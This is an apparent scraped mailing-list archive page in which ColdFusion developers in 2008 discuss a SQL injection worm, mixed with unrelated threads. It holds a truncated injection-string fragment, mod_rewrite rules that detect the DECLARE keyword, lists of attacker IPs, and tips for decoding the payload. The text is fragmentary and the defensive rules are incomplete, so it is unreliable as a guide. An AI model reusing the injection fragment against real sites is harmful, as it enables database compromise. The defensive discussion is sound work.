They are 3 3 2 2 . o r g
Google the first one and you get plenty of interesting info. It's been
used a number of times before...
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get
Terry Ford wrote:
Pretty ingenious really, infecting websites via injection attack in order to
infect clients with browser vulnerabilities.
In 2001 it was: http://www.cert.org/advisories/CA-2001-26.html Now it is
just business as usual.
Jochem
On Fri, Aug 8, 2008 at 11:12 PM, Raymond Camden [EMAIL PROTECTED] wrote:
Hmm. I'm having no luck with this. I'm trying it on a blogcfc site, so
it's being added after /, so I also added path_info
RewriteEngine on
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule ^(.*)$
Depending on your default directory settings in httpd.conf, you may
need to add the following directory attributes as well to your site to
allow mod_rewrite to operate:
#Allow mod rewrite on this directory
Directory /srv/www/htdocs/mysite
Options FollowSymLinks
AllowOverride All
Order
No go. It's not life or death - Im still using cfqueryparam, but I'd
love to get this working at the lowest level.
On Fri, Aug 8, 2008 at 11:47 PM, denstar [EMAIL PROTECTED] wrote:
non-wrapped (and it was grabbed off the web somewhere):
Options +FollowSymLinks
Options +Indexes
Ok, I've noticed that when I go to
host.com/?declare
it is working
but
host.com/x/index.cfm?';[EMAIL PROTECTED](4000);[EMAIL
Very nice, Den!
Thanks!
Rick
-Original Message-
From: denstar [mailto:[EMAIL PROTECTED]
Sent: Saturday, August 09, 2008 1:23 AM
To: CF-Talk
Subject: Re: iCalendar (.ics) file creation?
On Fri, Aug 8, 2008 at 10:18 PM, Rick Faircloth wrote:
I've got some code for using ical4j,
Ray,
Our sysadmin ran into the same issue when we started on this
yesterday Here is part of the rule we're using now and it works for
the case yours does not. note the ^.
RewriteCond %{QUERY_STRING} ^.*DECLARE.*$
Wil Genovese
One man with courage makes a majority.
-Andrew Jackson
A fine
I forget who, but some already posted here a list of website inside
the attack code. The websites are changing every few days.
Wil Genovese
One man with courage makes a majority.
-Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.
On Aug 9, 2008, at 12:17 AM,
Still no go for me. I appreciate the help from all.
On Sat, Aug 9, 2008 at 8:58 AM, Wil Genovese [EMAIL PROTECTED] wrote:
Ray,
Our sysadmin ran into the same issue when we started on this
yesterday Here is part of the rule we're using now and it works for
the case yours does not. note the
Which is a syntax error and can't be caught by error handling.
cfif session.thisuser is 1229
On Sat, Aug 9, 2008 at 12:31 AM, Michael Brennan-White
[EMAIL PROTECTED] wrote:
Actually the error was :
cfif session.thisuser = 1229
cfdump var=#Resultz# label=Resultz expand=false /
/cfif
1) It protects only against known threats. In order to be excluded we have
to be a step far enough ahead to make sure the pattern is included.
2) It will produce false positives.
3) It is not role or user based.
4) Tend to give a false sense of security.
Just to add to this, in my own testing
Nimda did not use SQL injection as any sort of primary vector.
SQL injection attacks have been around forever, but botnet/worm SQL injection
attacks have really taken off pretty recently. It has gotten so bad that even
Microsoft recently released a security advisory article that doesn't deal
Terry Ford wrote:
Nimda did not use SQL injection as any sort of primary vector.
But it infected websites in order to infect browsers in order to infect
websites etc. So the current wave of worms using the same mechanism is
really 7 years too late to be ingenious.
Jochem
P.S. Don't ask me how the hex code was deciphered. Our network
wizard did it and he just left on vacation. :))
I bet your network wizard spent too much time on it. :)
I showed how to decode the hex a couple weeks ago. All you have to do is
paste the injected SQL in query analyzer and
One of our DB guys had the code decoded in less than 5 minutes. I
email it to him then a few minutes later he said he was looking at
what the code was doing, so I walk across the office to see. Dang if
he hadn't decoded it already and was looking at the SQL.
Wil Genovese
One man with
I think it's already been discussed, but to decode this, all you need to do
is paste the complete script into a query window (Query Analyzer) and MAKE
SURE to change the EXEC to a PRINT at the end. Your SQL server will happily
decode the string for you.
--
Jeff
-Original Message-
Here are my top 50: Note that the top 1 is in the same subnet as your
top 1. I had 134,993 attempts that I caught..
IP (times)
203.160.1.52 (705)
203.162.3.160 (373)
203.160.1.76 (325)
61.164.132.230 (325)
59.15.212.125 (258)
210.112.177.244 (252)
70.189.143.59 (219)
221.253.217.138 (204)
Now look at how many of those are from Asia Pacific Network Info Centre
..:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
-Original Message-
From: Al Musella, DPM [mailto:[EMAIL PROTECTED]
Sent: Saturday, August 09, 2008 12:35 PM
To: CF-Talk
Subject: Re:
I am looking for a way to assign a different tab selector using cflayout. I
have the following snippet:
cflayoutarea title=Register
cflayout type=tab name=registertabs
cflayoutarea name=regtab1 title=Register Reports
source=registers.cfm /
cflayoutarea name=regtab2 title=Enter
Bobby, what have you been using to look up the origin of the IPs en masse?
I found a site that let's me do a handful at a time, but I don't know how
accurate the data it. It is saying the majority of my IPs originated from
the US.
~Brad
- Original Message -
From: Bobby Hartsfield
There are many that are on both lists.. most are
Asia, but there are some locals, like 24.73.176.42 which is in virginia.
I reported this to the FBI and offered to
help identify the computers involved in the
attack. IF they respond, maybe we could build a
web app that collects all of our logs
hi there. in hopes that someone might read this...
my company has an lcds 2.6 server currently sending data
to a flex client... and all is well... what im interested in
doing is writing an event gateway application that would utilize
the DataServicesMessaging event gateway, and have the cfc and
Okay that makes sense. Thanks for the help.
Which is a syntax error and can't be caught by error handling.
cfif session.thisuser is 1229
...
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release
As a KAVPS user looking for other providers (note the looking for other
providers part...), I would highly recommend you stay away from them. As far as
I can tell there is exactly one person running this business, which would be
fine if there weren't so many problems he needed to tend to.
* I
I heard back from the FBI.. a live agent, not an automated response
like I was expecting:)
They don't seem to care, but suggested that I report it to CERT at
https://www.cert.org/reporting/incident_form.txt
Perhaps if a few of us reported it to CERT, they will investigate.
By the way - I hit
I wrote something a long time ago to automate grabbing specified info from
http://ws.arin.net/whois/ on an IP... I was bored
You can pass the IP in the URL like so:
http://ws.arin.net/whois/?queryinput=203.160.1.52
So... parse the content of a cfhttp call to
They don't seem to care, but suggested that I report it to
CERT at https://www.cert.org/reporting/incident_form.txt
Perhaps if a few of us reported it to CERT, they will investigate.
CERT posted this back in June. It's been active for a while, but originally
targeted ASP only.
Dave Watts,
I guess i'm missing something, Bobby. Why does a big share of the
problem belong to Apnic?
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
On Sun, Aug 10, 2008
Because the majority of the IPs I've seen from this one belong to them... as
they do more than not in these situations.
Start keeping firewall logs in general and checking them. I guarantee you
will find APNIC in them.
..:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
All of my sites are on shared servers, and I don't have access to the CF
logs. With all of this SQL injection stuff going on, I feel like I should
be gathering data to analyze...but the inability to use CFLOG means I would
really need to roll my own. So, I have two choices -- use a database, or
Based on what you described, go with a database. A database would
likely have higher performance and the data would be easier to
analyze.
-Mike Chabot
On Sat, Aug 9, 2008 at 6:16 PM, Pete Ruckelshaus [EMAIL PROTECTED] wrote:
All of my sites are on shared servers, and I don't have access to the
hi guys,
does anyone know of a script that will shuffle the order of a two dimensional
array. i found a script on cflib.org that shuffled a one dimensional one and
tried to extend but to no avail!!
mike
~|
Adobe® ColdFusion®
This is my favorite home brew site:
http://homebrewheaven.com/
;-)
-Original Message-
From: Mike Chabot [mailto:[EMAIL PROTECTED]
Sent: Saturday, August 09, 2008 6:21 PM
To: CF-Talk
Subject: Re: Homebrew logging solutions [bayes SPAMTRAP][heur SPAMTRAP]
Based on what you described,
does anyone know of a script that will shuffle the order of a
two dimensional array. i found a script on cflib.org that
shuffled a one dimensional one and tried to extend but to no avail!!
I'm not exactly sure what result you want, but a two-dimensional array is
just an array of arrays. You
I agree. Log files can be quick and dirty but NOT easy to crunch unless you
import them into a database. Memory usage can also suck if you are
constantly reading and writing to a text file in some situations. If you
are REALLY concerned about performance, use cfthread for the logging so it
I'd tell you to watch what you suggest on a public forum, but heck-- we
already know the FBI doesn't care. :)
~Brad
Hmmm... if everyone did something like this... it would not only be
funny...
but probably piss off apnic and make them do something about their portion
of this problem
37 matches
Mail list logo
